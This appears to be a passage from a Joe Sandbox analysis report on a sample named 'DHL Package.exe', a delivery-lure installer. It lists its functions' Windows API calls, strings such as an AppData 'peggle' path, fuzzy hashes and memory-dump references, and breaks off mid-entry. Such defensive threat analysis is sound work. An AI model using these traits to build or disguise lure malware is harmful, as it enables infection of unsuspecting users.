Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\peggle$Call
API String ID: 2624150263-68931660
Opcode ID: ac22eba4f4e0706a7aa2aa9248de87666ca7b8c05486c05dfef1647bf889efd6
Instruction ID: d667353cedc46192e8d163e6c277cef07b4b15ed6202573052c67ff26174fc6d
Opcode Fuzzy Hash: ac22eba4f4e0706a7aa2aa9248de87666ca7b8c05486c05dfef1647bf889efd6
Instruction Fuzzy Hash: 02A194B1A00209ABDB11AFA5CD45AAF77B8EF84314F10803BF611B62D1D77C99418F6D

Function 6CA71B5F Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA7121B: GlobalAlloc.KERNELBASE(00000040,?,6CA7123B,?,6CA712DF,00000019,6CA711BE,-000000A0), ref: 6CA71225

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6CA71C8D
lstrcpyW.KERNEL32(00000008,?), ref: 6CA71CD5
lstrcpyW.KERNEL32(00000808,?), ref: 6CA71CDF
GlobalFree.KERNEL32(00000000), ref: 6CA71CF2
GlobalFree.KERNEL32(?), ref: 6CA71DD4
GlobalFree.KERNEL32(?), ref: 6CA71DD9
GlobalFree.KERNEL32(?), ref: 6CA71DDE
GlobalFree.KERNEL32(00000000), ref: 6CA71FC8
lstrcpyW.KERNEL32(?,?), ref: 6CA72182
GetModuleHandleW.KERNEL32(00000008), ref: 6CA72201
LoadLibraryW.KERNEL32(00000008), ref: 6CA72212
GetProcAddress.KERNEL32(?,?), ref: 6CA7226C
lstrlenW.KERNEL32(00000808), ref: 6CA72286

Memory Dump Source

Source File: 00000000.00000002.2308297886.000000006CA71000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA70000, based on PE: true

Associated: 00000000.00000002.2308249101.000000006CA70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308349849.000000006CA74000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2308398309.000000006CA76000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca70000_DHL Package.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 5769710c866d4236a8092d18cf0e6862ae2143f10994d9d296cfab7a67ce4563
Instruction ID: e74901bef0c0faab744fa8191b3b979389b263dc34d0eeaa340903f1d444cab6
Opcode Fuzzy Hash: 5769710c866d4236a8092d18cf0e6862ae2143f10994d9d296cfab7a67ce4563
Instruction Fuzzy Hash: F0228C79D04206DADB30CFA9C5946FEB7F0FB05309F24462AD269E6A80D77499C58F70

Function 004021A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221

Strings

C:\Users\user\AppData\Local\peggle\Dilettantkomediers, xrefs: 00402261

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\peggle\Dilettantkomediers
API String ID: 542301482-4134240001
Opcode ID: ee6a8428052df5805d107c8c5a2719c4b59fc84213f623760ea1d3354a2c3362
Instruction ID: ffb8b13858b70c1ff9263f9ad1230fafd83ab24b06fb2866c5c71dc23dde5df7
Opcode Fuzzy Hash: ee6a8428052df5805d107c8c5a2719c4b59fc84213f623760ea1d3354a2c3362
Instruction Fuzzy Hash: 1F411675A00209AFCF00DFE4C989A9E7BB6FF48304B2045AAF515EB2D1DB799981CB54

Function 00404D9E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 490windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DB5
GetDlgItem.USER32(?,00000408), ref: 00404DC2
GlobalAlloc.KERNEL32(00000040,?), ref: 00404E0E
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E25
SetWindowLongW.USER32(?,000000FC,004053B7), ref: 00404E3F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E53
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E67
SendMessageW.USER32(?,00001109,00000002), ref: 00404E7C
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E88
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E9A
DeleteObject.GDI32(00000110), ref: 00404E9F
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404ECA
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ED6
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F71
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FA1

Part of subcall function 00404366: SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374

SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FB5
GetWindowLongW.USER32(?,000000F0), ref: 00404FE3
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FF1
ShowWindow.USER32(?,00000005), ref: 00405001
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405102
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405164
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405179
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040519D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051C0
ImageList_Destroy.COMCTL32(?), ref: 004051D5
GlobalFree.KERNEL32(?), ref: 004051E5
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040525E
SendMessageW.USER32(?,00001102,?,?), ref: 00405307
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405316
InvalidateRect.USER32(?,00000000,00000001), ref: 00405340
ShowWindow.USER32(?,00000000), ref: 0040538E
GetDlgItem.USER32(?,000003FE), ref: 00405399
ShowWindow.USER32(00000000), ref: 004053A0

Strings

M, xrefs: 00404F59
, xrefs: 00405378
N, xrefs: 0040503D

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 8584f3799b0db8d261290d7efeb258875c9650e4874f8aded0a11708937f2ed0
Instruction ID: f13cb60032faeb06b1ff68bd0c1dc2f430bb97b794b1e627908efdb4cc4bd96d
Opcode Fuzzy Hash: 8584f3799b0db8d261290d7efeb258875c9650e4874f8aded0a11708937f2ed0
Instruction Fuzzy Hash: 04127DB0900609EFDF209F95CD45AAE7BB5FB84314F10817AFA10BA2E1D7798951CF58

Function 004044F0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040458E
GetDlgItem.USER32(?,000003E8), ref: 004045A2
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045BF
GetSysColor.USER32(?), ref: 004045D0
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045DE
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045EC
lstrlenW.KERNEL32(?), ref: 004045F1
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045FE
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404613
GetDlgItem.USER32(?,0000040A), ref: 0040466C
SendMessageW.USER32(00000000), ref: 00404673
GetDlgItem.USER32(?,000003E8), ref: 0040469E
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046E1
LoadCursorW.USER32(00000000,00007F02), ref: 004046EF
SetCursor.USER32(00000000), ref: 004046F2
LoadCursorW.USER32(00000000,00007F00), ref: 0040470B
SetCursor.USER32(00000000), ref: 0040470E
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040473D
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040474F

Strings

gD@, xrefs: 004046FA
Call, xrefs: 004046CD
N, xrefs: 0040468C

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N$gD@
API String ID: 3103080414-3987889410
Opcode ID: c2a8691b99c0880d176a200d2dcbd178e790d1d94455f1632e384604a8e92c19
Instruction ID: c6d0c18f0759a08483bb7b351ebc970df30fae26c4fd20534e815ca7361c8267
Opcode Fuzzy Hash: c2a8691b99c0880d176a200d2dcbd178e790d1d94455f1632e384604a8e92c19
Instruction Fuzzy Hash: FB6171B1900209BFDF10AF64DD85AAA7B69FB85314F00813AFA05B72D0D7789D51DB98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 80cfb8c675e835c75fd7954a1f24ba06797c47b4a778c986a5d394adc8f03950
Instruction ID: d01d0d5cc9b133415a9533ecc51a0e37331fb978861fbb258d472761deeb6ec3
Opcode Fuzzy Hash: 80cfb8c675e835c75fd7954a1f24ba06797c47b4a778c986a5d394adc8f03950
Instruction Fuzzy Hash: 80418C71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA1A0CB34D955DFA4

Function 00406027 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061C2,?,?), ref: 00406062
GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 0040606B

Part of subcall function 00405E36: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E46
Part of subcall function 00405E36: lstrlenA.KERNEL32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78

GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 00406088
wsprintfA.USER32 ref: 004060A6
GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 004060E1
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060F0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406128
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 0040617E
GlobalFree.KERNEL32(00000000), ref: 0040618F
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406196

Part of subcall function 00405ED1: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\DHL Package.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
Part of subcall function 00405ED1: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7

Strings

[Rename], xrefs: 00406110, 00406122
%ls=%ls, xrefs: 0040609C

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 29587da316c6c599c0e1183c46a51f077245d4dc447ecd9698dd2c76f7489909
Instruction ID: 12f543f5511dcafe86fd679503ff52a70677b7710d95204b96aa1b9436a2079a
Opcode Fuzzy Hash: 29587da316c6c599c0e1183c46a51f077245d4dc447ecd9698dd2c76f7489909
Instruction Fuzzy Hash: AD310271200715BFC2206B659D48F2B3AACDF41714F16003ABD86BA2D3DA3DAD1186BD

Function 0040668A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,77163420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Package.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 004066ED
CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 004066FC
CharNextW.USER32(?,00000000,77163420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Package.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406701
CharPrevW.USER32(?,?,77163420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Package.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406714

Strings

*?|<>/":, xrefs: 004066DC
"C:\Users\user\Desktop\DHL Package.exe", xrefs: 0040668A
C:\Users\user\AppData\Local\Temp\, xrefs: 0040668B

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\DHL Package.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3418220073
Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
Instruction ID: c93b7236ce9398e1af64c827f7f3df25a4e663042e3c0a86589bb20fd507ce77
Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
Instruction Fuzzy Hash: 6111CB2580061195DB3037548C84B7762E8EF547A4F52443FED86B32C0E77D5CA286BD

Function 00404398 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043B5
GetSysColor.USER32(00000000), ref: 004043F3
SetTextColor.GDI32(?,00000000), ref: 004043FF
SetBkMode.GDI32(?,?), ref: 0040440B
GetSysColor.USER32(?), ref: 0040441E
SetBkColor.GDI32(?,?), ref: 0040442E
DeleteObject.GDI32(?), ref: 00404448
CreateBrushIndirect.GDI32(?), ref: 00404452

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
Instruction ID: 9b2ff1ab0d94660d7576f8ed4a98babdba82e7b09994482354a54f078556bf7c
Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
Instruction Fuzzy Hash: 9B2162715007089BCB20DF38D948B5BBBF8AF80714B04892EE996A26E1D734E904CF59

Function 00404CEC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D07
GetMessagePos.USER32 ref: 00404D0F
ScreenToClient.USER32(?,?), ref: 00404D29
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D3B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D61

Strings

f, xrefs: 00404D3D

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: 38a9b76ebff3d9b0285b36f379b71c5e366e7bff37b4726e352de3fe70b617dc
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: DF014C71900219BBDB10DBA4DD85BFEBBB8AF95B11F10012BBA50B61C0D6B49A058BA5

Function 00401E4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84
CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3

Strings

Times New Roman, xrefs: 00401EB9

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
Instruction ID: b60ccfaacb74251373a9760c042081773c0d6d705e51916df09e3ce9171beb14
Opcode Fuzzy Hash: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
Instruction Fuzzy Hash: 2701D871950650EFEB006BB4AE89BDA3FB0AF55301F10493AF141B71E2C6B90404DB3D

Function 00402F2B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
MulDiv.KERNEL32(0005582C,00000064,000561C0), ref: 00402F74
wsprintfW.USER32 ref: 00402F84
SetWindowTextW.USER32(?,?), ref: 00402F94
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6

Strings

verifying installer: %d%%, xrefs: 00402F7E

Memory Dump Source

Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: fdbbe4e25b196e951a31d1700121d0a4c19e0197fdf79c60d2d61a266d2935a7
Instruction ID: f70e2e9d3cdf76f376be3492476da2a97ecf935c4d8f5b4406c9d83c61a08eb5
